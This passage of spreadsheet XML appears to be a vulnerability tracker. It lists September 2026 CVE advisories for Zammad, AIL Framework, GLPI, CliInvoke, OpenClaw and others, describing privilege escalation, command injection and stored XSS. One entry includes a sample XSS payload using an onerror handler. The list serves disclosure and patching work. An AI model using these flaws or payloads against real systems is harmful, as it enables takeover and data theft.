          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2 and 7.1.0, this issue concerns a lack of discursive validation within the authorization cascade. It has been determined that the system-level enforcement of access restrictions during the initialization of new identity objects exhibits a discrepancy: Under specific conditions, the granular restrictions of the access key being used are overridden by the latent authorization authority of the parent account. Consequently, this means that the intended separation of functional areas is nullified, resulting in an uncontrolled expansion of administrative discretion. Due to this potential integrity breach of the entire trust environment, an immediate evaluation of the authorization hierarchies is imperative. Impact An attacker can create new administrator accounts despite token restrictions. This grants full access to all system data (tickets, customers, configuration) and allows the attacker to take complete control of the Zammad instance. Abuse Scenario The vulnerability stems from a lack of synergy between the token-based authorization logic and the target system's functional authorization hierarchy, which allows for iterative escalation of the privileged access context. This issue is fixed in versions 7.0.2 and 7.1.0.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56733</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84462</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-20, CWE-94</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, a security filter that protects Zammad's AI Agent configuration can be bypassed by entering specially crafted text into one of an AI Agent's fields. An administrator with permission to create or edit AI Agents could exploit this to run arbitrary commands on the server that hosts Zammad, potentially reading, modifying, or destroying all data stored on that server. No interaction from other users is needed; the malicious code runs automatically the next time the affected AI Agent processes a ticket. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84462</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100172</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework (ail-project/ail-framework) contains a stored cross-site scripting (XSS) vulnerability in two Jinja2 templates that render popovers for matched, tracked, or tagged content: var/www/templates/chats_explorer/block_message.html and var/www/templates/objects/item/show_item.html. In both templates, dynamic values associated with this content, including icon color, icon style, icon glyph, subtype, identifier, name, description, and matched value, are interpolated directly into the data-content HTML attribute of Bootstrap popover elements without appropriate output encoding. Because the popovers are configured with data-html="true", the content is interpreted as HTML in the victim's browser. An authenticated attacker who can influence matched, tracked, or tagged content may inject arbitrary HTML or JavaScript into these values. When a victim displays the affected popover, the injected markup may execute in the victim's session, potentially enabling data exfiltration or actions with the victim's privileges. The vulnerability is classified as stored XSS because the malicious payload can persist in the affected match, tracking, or tag-related data and be delivered to users who view the affected content.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100172</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100176</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework's username timeline feature is vulnerable to stored cross-site scripting (XSS). Usernames imported from chats and crawled forums are stored without character restrictions. When an authenticated analyst views the username timeline, the application renders these stored usernames into the DOM using D3's html() method in the tooltip. Because the username value (d.obj) is interpolated directly into an HTML string without sanitization, a crafted username containing HTML event handlers (e.g., &lt;img src=x onerror=alert(1)&gt;) will execute arbitrary JavaScript in the analyst's browser when the analyst hovers over the corresponding timeline entry. The attack requires the victim to be an authenticated analyst with access to the timeline view and to interact with the malicious timeline entry (hover). Successful exploitation can lead to session hijacking, data exfiltration, or unauthorized actions performed within the analyst's authenticated session. The vulnerability resides in the client-side JavaScript file var/www/static/js/d3/timeline_basic.js.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100176</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47679</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 10.0.0 until 10.0.26 and 11.0.8, any logged-in GLPI user can exploit insufficient path validation in the profile-picture update flow to request deletion of an attacker-selected file hosted by the server. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47679</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55214</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.6 until 11.0.8, an authenticated technician can store active markup in supplier website fields. Any user who opens the affected item's suppliers list triggers the stored cross-site scripting payload. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55214</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71483</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 1.6.0, the search parameter at /employee/employee-filter-view is reflected by jQuery .html() in employee/templates/employee_nav.html without HTML neutralization. An external attacker can craft and deliver a link that causes JavaScript to execute when an authenticated employee or administrator reaches the employee filter, allowing access to browser-visible session data and actions with the victim's application privileges. This issue is fixed in version 1.6.0.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71483</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100248</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>The Rattadan Cosmowarp smart contract before 56c6147 can have a comparison to an unintended value of current_admin.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100248</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100368</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke.Specializations, nuget:CliInvoke.Specializations</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.1</t>
        </is>
      </c>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>CliInvoke is a .NET library for invoking command-line programs, and its `CliInvoke.Specializations` packages provide specialized wrappers for shells such as PowerShell and Windows Command Prompt. `CliInvoke.Specializations` versions 2.2.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, 3.0.0-alpha.1 through 3.0.0-alpha.4, and 3.0.0-alpha.8 through 3.0.0-alpha.10, as well as `AlastairLundy.CliInvoke.Specializations` versions 1.0.0-rc.1 through 1.6.1.1, contain an OS command injection vulnerability in their PowerShell and Cmd wrappers. The wrappers pass a caller-controlled target and arguments to `pwsh -Command` or `cmd /c` using a single `ProcessStartInfo.Arguments` string, allowing a double quote in untrusted input to break operating-system-level quoting and cause the shell to execute an additional command with the host process's privileges. The vulnerability is patched in `CliInvoke.Specializations` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.1, and in `AlastairLundy.CliInvoke.Specializations` version 2.0.2. No complete workaround is available; users unable to upgrade should reject or remove double quotes from target paths and arguments, additionally reject shell metacharacters in versions 2.2.0 through 2.9.2 and 3.0.0-alpha.1 through 3.0.0-alpha.4, or bypass the PowerShell and Cmd wrappers and invoke target processes directly when handling untrusted input.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100368</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100369</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke, nuget:CliInvoke</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.2</t>
        </is>
      </c>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>CliInvoke and its formerly named `AlastairLundy.CliInvoke` package are .NET libraries for invoking command-line programs and wrapping executable processes. `CliInvoke` versions 2.0.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, and 3.0.0-alpha.1 through 3.0.0-beta.1, as well as `AlastairLundy.CliInvoke` versions 2.0.0-alpha.1 through 2.0.0, contain an argument-injection vulnerability in `RunnerProcessFactory` on the 2.x line and `RunnerConfigurationFactory` on the 3.x line. These factories combine runner arguments, a caller-controlled target, and caller-controlled arguments into one `ProcessStartInfo.Arguments` string, allowing a double quote in the target or an argument to terminate an operating-system-level quoted region and inject unintended elements into the runner’s argument vector, potentially resulting in arbitrary command execution when a shell runner is used. The vulnerability is patched in `CliInvoke` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.2, and in `AlastairLundy.CliInvoke` version 2.0.2. No complete workaround is available; users unable to upgrade can partially mitigate the issue by removing double quotes from targets and arguments, additionally removing shell metacharacters when using shell runners, or bypassing the vulnerable factory and constructing a `ProcessConfiguration` with an explicit `ArgumentList`.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100369</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56731</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, a low-privilege authenticated user may inject arbitrary HTML markup, including JavaScript event handlers, into a ticket title via the standard ticket creation workflow. The title is persisted without sanitization. This issue is fixed in version 7.0.1.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56731</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97898</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Insecure Direct Object Reference / missing object-level authorization in the Akia keyless entry cloud service. The unlock action is relying on a client-supplied room/door identifier that is not properly authorized server-side against the authenticated guest's booking. An authenticated guest could unlock rooms other than their own, resulting in unauthorized physical access to guest rooms at an affected property.
As of 19th September 2026 the service is no more vulnerable to this attack (feedback received by the reporter). 
The attack is remote but the effect is local to an affected property.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97898</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100551</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>OpenClaw for iOS versions &gt;= 2026.7.1 and &lt; 2026.8.11 do not enforce saved Gateway TLS pins in the Control UI. While native connections enforced the saved Gateway fingerprint, the authenticated Terminal and session Dashboard WebViews omitted it. If a user had accepted a Gateway fingerprint, an attacker able to redirect the same host and port and present a different certificate that is accepted by iOS system trust can serve a replacement Control UI page; opening the Terminal or a session Dashboard then allows that page to read the injected Gateway token or password. The stolen credential can grant operator access, including reading sensitive Gateway state and invoking host-capable tools. This issue is fixed in 2026.8.11.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100551</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100557</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability in skill tool dispatch that fails to carry the sender's owner status. Non-owner senders authorized to invoke skill commands can access owner-only tools and server credentials reserved for owners.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100557</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100568</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
